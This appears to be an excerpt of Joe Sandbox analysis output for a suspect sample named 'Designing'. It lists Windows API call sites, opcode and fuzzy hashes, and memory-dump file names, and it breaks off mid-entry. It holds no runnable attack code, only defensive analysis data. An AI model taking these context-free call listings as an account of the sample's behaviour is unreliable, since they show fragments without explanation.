                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                              • String ID: cdecl
                                                                                                                                                                              • API String ID: 4031866154-3896280584
                                                                                                                                                                              • Opcode ID: ddbe94e423daaa28ce63c69107333ecbf9c52db2055e74b295bfb7ead64178c5
                                                                                                                                                                              • Instruction ID: 1b827e139d6e3a10d4629db45cc447d15ee6ad1c6f267683431a24e1818a17cb
                                                                                                                                                                              • Opcode Fuzzy Hash: ddbe94e423daaa28ce63c69107333ecbf9c52db2055e74b295bfb7ead64178c5
                                                                                                                                                                              • Instruction Fuzzy Hash: 5411263A200342AFCB149F78DC45E7A77E9FF85754B10512AF982D72A4EF319851C7A0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00001060,?,00000004), ref: 00E3615A
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E3616C
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E36177
                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E362B5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend_wcslen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 455545452-0
                                                                                                                                                                              • Opcode ID: 4c9a799b3a914db8eab2369bbea4c102fe250817b1e08c1e96a4508c23fd9823
                                                                                                                                                                              • Instruction ID: 3f4f8f6c50ab88ba18be1e14c31d8d75445657f7e9a30603b529b5238e70418c
                                                                                                                                                                              • Opcode Fuzzy Hash: 4c9a799b3a914db8eab2369bbea4c102fe250817b1e08c1e96a4508c23fd9823
                                                                                                                                                                              • Instruction Fuzzy Hash: 3011D336600208AADB10EF659C88EEF7FBCEB51354F14902AFA15F6182EB70C944CB70
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a925b67b660a3903b361390104d0f8501e5514413d17bf1364360a08fab43a55
                                                                                                                                                                              • Instruction ID: 783737972ce36b23caef390737830366db393c78bea7d694329e88ef9a1980ca
                                                                                                                                                                              • Opcode Fuzzy Hash: a925b67b660a3903b361390104d0f8501e5514413d17bf1364360a08fab43a55
                                                                                                                                                                              • Instruction Fuzzy Hash: 67014FB22092167FE72126B97CC1F77660DDFA13B8B384727B521A13D5DA608D449570
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00E02394
                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E023A6
                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E023BC
                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E023D7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: faf9d1c754344442f0197b698d02588571823ba5508e247bac46724600040b11
                                                                                                                                                                              • Instruction ID: 3a43188f4ed255d45c6115758c48ac5ccd73257dae069800f6b9001736a1c7b2
                                                                                                                                                                              • Opcode Fuzzy Hash: faf9d1c754344442f0197b698d02588571823ba5508e247bac46724600040b11
                                                                                                                                                                              • Instruction Fuzzy Hash: 5611393A900219FFEF119BA5CD89F9DBBB8FB08754F200095EA00B7290D6756E50DB94
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00E0EB14
                                                                                                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00E0EB47
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E0EB5D
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E0EB64
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2880819207-0
                                                                                                                                                                              • Opcode ID: c2860f79b10b9021194e1cdf614a1fe34cfe80c2a614a0bbb3e2844e3e6ed081
                                                                                                                                                                              • Instruction ID: 9dd8b6a0270dd173356fca7c925e32515b7c59955195c76e18ad76923f5223f0
                                                                                                                                                                              • Opcode Fuzzy Hash: c2860f79b10b9021194e1cdf614a1fe34cfe80c2a614a0bbb3e2844e3e6ed081
                                                                                                                                                                              • Instruction Fuzzy Hash: 42112B72904259BFC711DBA99C0AADE7FADEB45314F00426AF915F33D0D6748D488B60
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateThread.KERNEL32(00000000,?,00DCD369,00000000,00000004,00000000), ref: 00DCD588
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DCD594
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00DCD59B
                                                                                                                                                                              • ResumeThread.KERNEL32(00000000), ref: 00DCD5B9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 173952441-0
                                                                                                                                                                              • Opcode ID: 0c8be5be6a680b94f1bcf48c71897fe0904c3593565b60543e44aaba82be3ebd
                                                                                                                                                                              • Instruction ID: c615f3b40a674cea6f123f55ebb72147046b9d1ab11a1c9f38df78b3768f9343
                                                                                                                                                                              • Opcode Fuzzy Hash: 0c8be5be6a680b94f1bcf48c71897fe0904c3593565b60543e44aaba82be3ebd
                                                                                                                                                                              • Instruction Fuzzy Hash: EE01D6324141167FCB106FA5EC09FAA7B6AEF42734F24022DF925971E0DB708805C6B1
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DA78B1
                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00DA78C5
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DA78CF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3970641297-0
                                                                                                                                                                              • Opcode ID: c386d98ebb2aa620332170ead4c3b4b4d180bf621f65b4d760a8ef1a12c67e6a
                                                                                                                                                                              • Instruction ID: 38ec2d1d8dc43888a05502db0abaf742edac2f9211d89abfdaab3cc293b4f307
                                                                                                                                                                              • Opcode Fuzzy Hash: c386d98ebb2aa620332170ead4c3b4b4d180bf621f65b4d760a8ef1a12c67e6a
                                                                                                                                                                              • Instruction Fuzzy Hash: A911AD72505148BFDF065FA1DC58EEA7B69FF093A4F080116FA0462120D739DC60EBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00DD338D,00000364,00000000,00000000,00000000,?,00DD35FE,00000006,FlsSetValue), ref: 00DD3418
                                                                                                                                                                              • GetLastError.KERNEL32(?,00DD338D,00000364,00000000,00000000,00000000,?,00DD35FE,00000006,FlsSetValue,00E43260,FlsSetValue,00000000,00000364,?,00DD31B9), ref: 00DD3424
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00DD338D,00000364,00000000,00000000,00000000,?,00DD35FE,00000006,FlsSetValue,00E43260,FlsSetValue,00000000), ref: 00DD3432
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                              • Opcode ID: 51b15ec63ab76cee66c8d37f61f515f8e1040ec82c57daafcdcb46c3c129a1eb
                                                                                                                                                                              • Instruction ID: d090da3ff0716d972ec20fea0866f9f8bff8060e8a18e013fac42f728295ca8f
                                                                                                                                                                              • Opcode Fuzzy Hash: 51b15ec63ab76cee66c8d37f61f515f8e1040ec82c57daafcdcb46c3c129a1eb
                                                                                                                                                                              • Instruction Fuzzy Hash: 6F01F7326553269FCB228B7AAC489577B58BF05B717280225F946E3381C725DD05C6F1
                                                                                                                                                                              APIs
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E0B69A,?,00008000), ref: 00E0BA8B
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E0B69A,?,00008000), ref: 00E0BAB0
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E0B69A,?,00008000), ref: 00E0BABA
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E0B69A,?,00008000), ref: 00E0BAED
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2875609808-0
                                                                                                                                                                              • Opcode ID: fdc08fe2723180bc0f502deb0b121f53d7f1cd949e9ae44d270ef43670429cc8
                                                                                                                                                                              • Instruction ID: dc7d89f5e1dfa8e4a2adea782cdd8ac8379d49e83805587ed31964ca34fe70c8
                                                                                                                                                                              • Opcode Fuzzy Hash: fdc08fe2723180bc0f502deb0b121f53d7f1cd949e9ae44d270ef43670429cc8
                                                                                                                                                                              • Instruction Fuzzy Hash: D3117930E0562DEBCF009FE5E9486EEBB78FF09710F100095E941B2180CB3086948BA5
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00E3888E
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00E388A6
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00E388CA
                                                                                                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E388E5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 357397906-0
                                                                                                                                                                              • Opcode ID: c43f4259417c5ee2048f37ab494af110f72045fc1c32b0c2a5b554cb0faf85aa
                                                                                                                                                                              • Instruction ID: d692ff57fca8ab64d1fb951083f214886b035bc7eb7bffd848d3c316a9b0e04d
                                                                                                                                                                              • Opcode Fuzzy Hash: c43f4259417c5ee2048f37ab494af110f72045fc1c32b0c2a5b554cb0faf85aa
                                                                                                                                                                              • Instruction Fuzzy Hash: DE1160B9D0020DAFDB01CFA9D885AEEBBB5FB08314F509166E925E2210D735AA54CF50
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E03712
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E03723
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00E0372A
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E03731
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2710830443-0
                                                                                                                                                                              • Opcode ID: 05722d7a5cccfeda1d6e0976cf5ed0992ed8e0a3ff7bc8652d5435e669b8774d
                                                                                                                                                                              • Instruction ID: 7a153ada6d733bfc92893ad42dc83f44517b0a9e38aad54ee94cd47af5d8dc86
                                                                                                                                                                              • Opcode Fuzzy Hash: 05722d7a5cccfeda1d6e0976cf5ed0992ed8e0a3ff7bc8652d5435e669b8774d
                                                                                                                                                                              • Instruction Fuzzy Hash: E6E06DF11052287BDA2017A3AC4EEEB7F6CDB52BA1F440016F105F2080DAA08984C2B0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DA1F87
                                                                                                                                                                                • Part of subcall function 00DA1F2D: SelectObject.GDI32(?,00000000), ref: 00DA1F96
                                                                                                                                                                                • Part of subcall function 00DA1F2D: BeginPath.GDI32(?), ref: 00DA1FAD
                                                                                                                                                                                • Part of subcall function 00DA1F2D: SelectObject.GDI32(?,00000000), ref: 00DA1FD6
                                                                                                                                                                              • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00E392E3
                                                                                                                                                                              • LineTo.GDI32(?,?,?), ref: 00E392F0
                                                                                                                                                                              • EndPath.GDI32(?), ref: 00E39300
                                                                                                                                                                              • StrokePath.GDI32(?), ref: 00E3930E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1539411459-0
                                                                                                                                                                              • Opcode ID: 6053819d6f45ca344faf4545572c97db951e86d109e7eef9287fd47690ffccb4
                                                                                                                                                                              • Instruction ID: c3c080b6ce17d6d144ac1fa9874c1470c492ec70022f48d4c277611474d30d70
                                                                                                                                                                              • Opcode Fuzzy Hash: 6053819d6f45ca344faf4545572c97db951e86d109e7eef9287fd47690ffccb4
                                                                                                                                                                              • Instruction Fuzzy Hash: 12F03A3200A658BEDB126F55AC0EFCA3E6AAF4A724F048000FB15351E2C7B55565DFA5
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSysColor.USER32(00000008), ref: 00DA21BC
                                                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 00DA21C6
                                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00DA21D9
                                                                                                                                                                              • GetStockObject.GDI32(00000005), ref: 00DA21E1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Color$ModeObjectStockText
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4037423528-0
                                                                                                                                                                              • Opcode ID: 4be45ad4c36b78777af3792371557ae59a6d42dc63cd4a3658bb85a3611c88da
                                                                                                                                                                              • Instruction ID: 24614de63d85dfa49c37e3dffbb9520188d62fa7d6d4536994b49b250501b8bb
                                                                                                                                                                              • Opcode Fuzzy Hash: 4be45ad4c36b78777af3792371557ae59a6d42dc63cd4a3658bb85a3611c88da
                                                                                                                                                                              • Instruction Fuzzy Hash: EFE06531245284BFDB215B76BC0D7E83F51AB12335F088219F7B5640E0C77246449B20
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00DFEC36
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00DFEC40
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DFEC60
                                                                                                                                                                              • ReleaseDC.USER32(?), ref: 00DFEC81
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                                                              • Opcode ID: 309f5e34da5fb53efb72cef9e38ae3700c3b2edf7ffe5927d5f64c8fa50ff39f
                                                                                                                                                                              • Instruction ID: dd1cc69248b6414942233fb5ccc276bc02734296e7b169c79d7ab8627e46cd23
                                                                                                                                                                              • Opcode Fuzzy Hash: 309f5e34da5fb53efb72cef9e38ae3700c3b2edf7ffe5927d5f64c8fa50ff39f
                                                                                                                                                                              • Instruction Fuzzy Hash: D5E0E5B1804208DFCB419FA1AD4DA6DBFB1EB08310B118809E95AE3260C73899059F20
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00DFEC4A
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00DFEC54
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DFEC60
                                                                                                                                                                              • ReleaseDC.USER32(?), ref: 00DFEC81
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                                                              • Opcode ID: c1a108227261cfca14861ca3fec443b586ba4428ab3560a1bfd15a617aabdd43
